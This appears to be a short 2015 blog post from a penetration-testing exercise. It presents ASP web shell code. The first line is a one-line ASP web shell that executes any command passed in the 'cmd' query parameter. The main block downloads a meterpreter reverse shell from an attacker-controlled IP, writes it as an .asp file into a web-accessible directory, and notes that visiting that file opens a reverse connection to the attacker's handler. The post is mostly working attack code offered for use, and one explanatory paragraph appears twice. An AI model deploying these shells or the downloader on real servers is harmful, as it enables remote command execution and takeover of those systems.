<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
Tuesday, July 14, 2015
One Line ASP Shell
Write to local file from ASP
I'm currently doing an exercise that requires me to have a server pull a reverse meterpreter asp shell from a remote location and store it to a specific file location on the server filesystem. This is the ASP code I ended up creating:
"http://192.168.50.172/meta.txt" is the meterpreter ASP shell saved as a txt file.
"C:/Program Files (x86)/WEBSERVERHERE/test.asp" is what the meta.txt file will be saved as on the server's filesystem. Ideally you'd save that asp shell to a directory accessible via the web, because simply visiting the .asp file will execute it to reverse connect to your multi handler.
<% Function GetTextFromUrl(url) Dim oXMLHTTP Dim strStatusTest Set oXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP.3.0") oXMLHTTP.Open "GET", url, False oXMLHTTP.Send If oXMLHTTP.Status = 200 Then GetTextFromUrl = oXMLHTTP.responseText End If End Function Dim sResult : sResult = GetTextFromUrl("http://192.168.50.172/meta.txt") response.write sResult dim fs,f set fs=Server.CreateObject("Scripting.FileSystemObject") set f=fs.CreateTextFile("C:/Program Files (x86)/WEBSERVERHERE/test.asp",true) f.write(sResult) f.close set f=nothing set fs=nothing %>
"http://192.168.50.172/meta.txt" is the meterpreter ASP shell saved as a txt file.
"C:/Program Files (x86)/WEBSERVERHERE/test.asp" is what the meta.txt file will be saved as on the server's filesystem. Ideally you'd save that asp shell to a directory accessible via the web, because simply visiting the .asp file will execute it to reverse connect to your multi handler.
Subscribe to:
Posts (Atom)